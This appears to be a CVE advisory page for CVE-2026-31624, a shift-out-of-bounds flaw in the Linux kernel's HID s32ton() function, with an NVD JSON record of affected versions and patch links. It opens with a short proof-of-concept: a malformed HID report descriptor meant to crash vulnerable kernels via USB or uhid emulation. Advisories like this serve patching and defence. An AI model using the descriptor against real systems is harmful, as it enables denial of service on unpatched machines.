CVE-2026-31624

/* * Conceptual PoC for CVE-2026-31624 * This snippet demonstrates a malicious HID Report Descriptor * designed to trigger the shift-out-of-bounds in s32ton(). */ #include <linux/hid.h> // Malicious report descriptor with Report Size > 32 (e.g., 255) static const __u8 malicious_hid_report_desc[] = { 0x05, 0x01, // Usage Page (Generic Desktop) 0x09, 0x06, // Usage (Keyboard) 0xA1, 0x01, // Collection (Application) 0x75, 0xFF, // Report Size (255) - Triggers shift overflow 0x95, 0x01, // Report Count (1) 0x81, 0x02, // Input (Data, Var, Abs) 0xC0 // End Collection }; // Note: To exploit, this descriptor would be presented by a USB device // or emulated via uhid/hidraw, triggering hid_output_field().

{"cve": {"id": "CVE-2026-31624", "sourceIdentifier": "416baaa9-dc9f-4396-8d5f-8c081fb06d67", "published": "2026-04-24T15:16:41.697", "lastModified": "2026-04-28T14:02:38.647", "vulnStatus": "Analyzed", "cveTags": [], "descriptions": [{"lang": "en", "value": "In the Linux kernel, the following vulnerability has been resolved:\n\nHID: core: clamp report_size in s32ton() to avoid undefined shift\n\ns32ton() shifts by n-1 where n is the field's report_size, a value that\ncomes directly from a HID device. The HID parser bounds report_size\nonly to <= 256, so a broken HID device can supply a report descriptor\nwith a wide field that triggers shift exponents up to 256 on a 32-bit\ntype when an output report is built via hid_output_field() or\nhid_set_field().\n\nCommit ec61b41918587 (\"HID: core: fix shift-out-of-bounds in\nhid_report_raw_event\") added the same n > 32 clamp to the function\nsnto32(), but s32ton() was never given the same fix as I guess syzbot\nhadn't figured out how to fuzz a device the same way.\n\nFix this up by just clamping the max value of n, just like snto32()\ndoes."}], "metrics": {"cvssMetricV31": [{"source": "[email protected]", "type": "Primary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:N/I:N/A:H", "baseScore": 5.5, "baseSeverity": "MEDIUM", "attackVector": "LOCAL", "attackComplexity": "LOW", "privilegesRequired": "LOW", "userInteraction": "NONE", "scope": "UNCHANGED", "confidentialityImpact": "NONE", "integrityImpact": "NONE", "availabilityImpact": "HIGH"}, "exploitabilityScore": 1.8, "impactScore": 3.6}]}, "weaknesses": [{"source": "[email protected]", "type": "Primary", "description": [{"lang": "en", "value": "NVD-CWE-noinfo"}]}], "configurations": [{"nodes": [{"operator": "OR", "negate": false, "cpeMatch": [{"vulnerable": true, "criteria": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*", "versionStartIncluding": "2.6.20.1", "versionEndExcluding": "6.6.136", "matchCriteriaId": "098695E6-95CE-401B-AC16-CEBD793B4DF1"}, {"vulnerable": true, "criteria": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*", "versionStartIncluding": "6.7", "versionEndExcluding": "6.12.83", "matchCriteriaId": "7F0AE5B5-23AC-4DCC-B37A-51CA1DAE7BA8"}, {"vulnerable": true, "criteria": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*", "versionStartIncluding": "6.13", "versionEndExcluding": "6.18.24", "matchCriteriaId": "8126B8B8-6D0B-4443-86C1-672AEE893555"}, {"vulnerable": true, "criteria": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*", "versionStartIncluding": "6.19", "versionEndExcluding": "6.19.14", "matchCriteriaId": "D6A8A074-BBF4-4803-ABED-519A839435BB"}, {"vulnerable": true, "criteria": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*", "versionStartIncluding": "7.0", "versionEndExcluding": "7.0.1", "matchCriteriaId": "9B5888AB-7403-4335-89E4-21CC0B48366A"}, {"vulnerable": true, "criteria": "cpe:2.3:o:linux:linux_kernel:2.6.20:-:*:*:*:*:*:*", "matchCriteriaId": "5AE1560A-DECA-4BC6-87F6-F3F9ED544840"}]}]}], "references": [{"url": "https://git.kernel.org/stable/c/58386f00af710922cafb0fb69211497beddfaa95", "source": "416baaa9-dc9f-4396-8d5f-8c081fb06d67", "tags": ["Patch"]}, {"url": "https://git.kernel.org/stable/c/69c02ffde6ed4d535fa4e693a9e572729cad3d0d", "source": "416baaa9-dc9f-4396-8d5f-8c081fb06d67", "tags": ["Patch"]}, {"url": "https://git.kernel.org/stable/c/8a8333237f1f5caab8d4c3d2c2e7578c4263a97f", "source": "416baaa9-dc9f-4396-8d5f-8c081fb06d67", "tags": ["Patch"]}, {"url": "https://git.kernel.org/stable/c/932ae5309e53561197aa7d1606c7cf63af10e24f", "source": "416baaa9-dc9f-4396-8d5f-8c081fb06d67", "tags": ["Patch"]}, {"url": "https://git.kernel.org/stable/c/97014719bb8fccb1ffcbbc299e84b1f11b114195", "source": "416baaa9-dc9f-4396-8d5f-8c081fb06d67", "tags": ["Patch"]}, {"url": "https://git.kernel.org/stable/c/ea363a34086ddb4231adc581a7f36c39ec154bfc", "source": "416baaa9-dc9f-4396-8d5f-8c081fb06d67", "tags": ["Patch"]}]}}